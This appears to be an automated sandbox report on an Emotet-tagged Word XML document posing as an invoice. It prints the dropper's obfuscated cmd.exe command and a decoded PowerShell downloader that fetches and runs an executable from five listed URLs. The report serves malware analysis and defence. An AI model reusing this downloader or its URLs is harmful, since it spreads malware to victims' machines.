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
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00D718DB
WordDocumentBodySectPRRsidRPr: 00F74043
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
18
Malicious processes
8
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start msoxmled.exe no specs winword.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs findstr.exe no specs cmd.exe no specs powershell.exe 784.exe no specs 784.exe wabmetagen.exe no specs #EMOTET wabmetagen.exe winword.exe no specs winword.exe no specs winword.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
284c:\m4308\n1983\c4441\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2396cmd C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2640powershell $d7581='b1374';$p8598=new-object Net.WebClient;$u8098='http://erdembulut.com/trEVDaG@http://baijinfen.com/6Me2lTHSrw@http://fatmanurtaskesen.com/0D5KBf4Gk@http://paksoymuhendislik.com/pddSDsBsF@http://bootaly.com/Fex5t7fe'.Split('@');$a4649='n3225';$r7322 = '784';$w161='u3261';$k4316=$env:temp+'\'+$r7322+'.exe';foreach($u1616 in $u8098){try{$p8598.DownloadFile($u1616, $k4316);$v2280='v9677';If ((Get-Item $k4316).length -ge 40000) {Invoke-Item $k4316;$o9640='o5709';break;}}catch{}}$p7339='h5798';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2680"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Inv_201901_KY989632-32.doc.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2736CmD /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37